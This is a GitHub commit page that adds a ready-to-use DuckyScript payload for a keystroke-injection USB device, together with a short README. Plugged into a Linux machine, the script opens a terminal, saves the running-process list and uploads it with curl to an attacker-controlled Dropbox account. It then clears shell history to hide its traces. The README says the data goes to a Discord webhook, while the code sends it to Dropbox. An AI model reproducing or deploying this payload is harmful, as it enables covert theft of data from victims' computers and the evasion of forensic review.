Merge pull request #152 from aleff-github/patch-19

Exfiltrate Process Info
pull/178/head
Kalani Helekunihi 2023-06-12 14:36:20 -04:00 committed by GitHub
commit 9af47a7c54
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 69 additions and 0 deletions

View File

@ -0,0 +1,27 @@
# Exfiltrate Process Info - Linux ✅
A script used to exfiltrate the process info on a Linux machine.
**Category**: Exfiltration
## Description
A script used to exfiltrate the process info on a Linux machine.
Opens a shell, get the process info, set the Discord webhook configuration, send it to the discord webhook, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Discord Webhook
### Executing program
* Plug in your device
### Settings
* Set the Discord Webhook configuration

View File

@ -0,0 +1,42 @@
REM ##########################################
REM # |
REM # Title : Exfiltrate Process Info |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##########################################
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
REM Required: Set here your Dropbox access TOKEN
DEFINE #TOKEN example
DEFINE #DROPBOX_FOLDER_NAME example
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
DEFAULT_DELAY 500
CTRL ALT t
DELAY 2000
REM #### GET PROCESS SECTION ####
STRINGLN ps aux > process.txt
REM #### EXFILTRATE SECTION ####
STRINGLN ACCESS_TOKEN="#TOKEN"
STRINGLN USER_NAME=$(whoami)
STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"
REM Set yout Dropbox folder name
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
STRINGLN curl -X POST #DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
DELAY 2000
REM #### REMOVE TRACES ####
STRINGLN history -c
STRINGLN exit